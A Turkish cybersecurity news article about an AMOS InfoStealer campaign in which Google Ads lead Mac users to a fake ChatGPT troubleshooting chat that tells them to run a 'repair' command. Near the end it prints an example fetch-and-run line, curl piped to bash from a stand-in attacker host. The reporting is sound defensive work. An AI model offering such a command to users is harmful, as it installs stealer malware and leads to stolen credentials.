Tehdit Aktörleri AMOS InfoStealer ile Mac Cihazlara Saldırmak İçin ChatGPT’den Yararlanıyor

   Aralık 11, 2025  Posted in CyberSecurityNews


Tehdit Aktörleri AMOS InfoStealer ile Mac Cihazlara Saldırmak İçin ChatGPT'den Yararlanıyor

Yeni bir AMOS InfoStealer kampanyası, basit sorun giderme yardımı kisvesi altında Mac cihazlarına virüs bulaştırmak için ChatGPT’ye olan güveni kötüye kullanıyor.

Mağdurlar bir ses sorununa çözüm arıyor, sponsorlu bir ChatGPT sonucunu tıklıyor ve onlara normal bir sohbet oturumuna benzeyen bir şey gösteriliyor.

Sohbet daha sonra bir “onarım” komutu döndürür ve kullanıcıya bu komutu macOS terminalinde çalıştırmasını söyler.

Etkilenen Mac cihazından Google Chrome Gözatma Geçmişi özeti (Kaynak - KROLL)
Virüs bulaşmış Mac cihazından Google Chrome Gözatma Geçmişi özü (Kaynak – KROLL)Bulaşmış Mac cihazından Google Chrome Gözatma Geçmişi özü (Kaynak – KROLL)

Saldırı, sosyal mühendislik ile teknik istismarı, kullanıcılara rutin gibi gelecek şekilde harmanlıyor. Sahte yükleyici penceresi veya bariz kimlik avı sayfası yok.

Bunun yerine kurban, iyi bilinen bir yapay zeka sohbet arayüzünde normal bir destek akışı gibi görünen yolu izliyor. KROLL güvenlik araştırmacıları, bu akışın AMOS InfoStealer’ı hedeflenen Mac uç noktalarına dağıtmak için kullanıldığını belirledi.

KROLL ekibi, yemin, kötü amaçlı ChatGPT oturumunu arama sonuçlarının en üstüne yerleştiren Google Ads kullanılarak gönderildiğini tespit etti. Gösterilen alan adı yasaldır ve bu da normal bir kullanıcının riski fark etmesini daha da zorlaştırır.

google

Kullanıcı sohbete güvendiğinde, terminaldeki tek bir kopyala-yapıştır işlemi sistemin güvenliğini tehlikeye atmak için yeterlidir.

Kullanıcıya gösterilen ChatGPT Talimatları (Kaynak - KROLL)
Kullanıcıya gösterilen ChatGPT Talimatları (Kaynak – KROLL)

Etki hem ev kullanıcıları hem de şirketler için ciddi. AMOS InfoStealer, virüslü Mac’ten tarayıcı verilerini, kimlik bilgilerini, oturum çerezlerini ve saklanan diğer sırları toplamak için tasarlanmıştır.

Çalınan veriler daha sonra hesap devralma, yatay hareket veya yeraltı pazarlarında satış için yeniden kullanılabilir.

Enfeksiyon Mekanizması ve Kötü Amaçlı Komut Uygulaması

KROLL analistleri, ilk bulaşmanın izini sahte ChatGPT sohbeti tarafından verilen ve bir tehlike göstergesi olarak hareket eden bir terminal komutuna kadar takip etti.

Komut, macOS’a, kullanıcı yürütme ve giriş aracı aktarımı için MITRE ATT&CK teknikleriyle uyumlu bir model olan uzak bir komut dosyasını indirip çalıştırmasını söyler.

Tipik bir kötü amaçlı model şuna benzer: –

curl -s https://attacker-example[.]com/installer.sh | bash

Bu tek satırlık komut yürütüldüğünde, HTTPS üzerinden bir kabuk komut dosyası çeker, kullanıcının görebileceği hiçbir şeyi kaydetmez ve komut dosyasını aynı terminal oturumunda çalıştırır. Betik daha sonra AMOS’u kurabilir, kalıcılığı ayarlayabilir ve veri hırsızlığını başlatabilir.

Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.

googlehaberler



Source link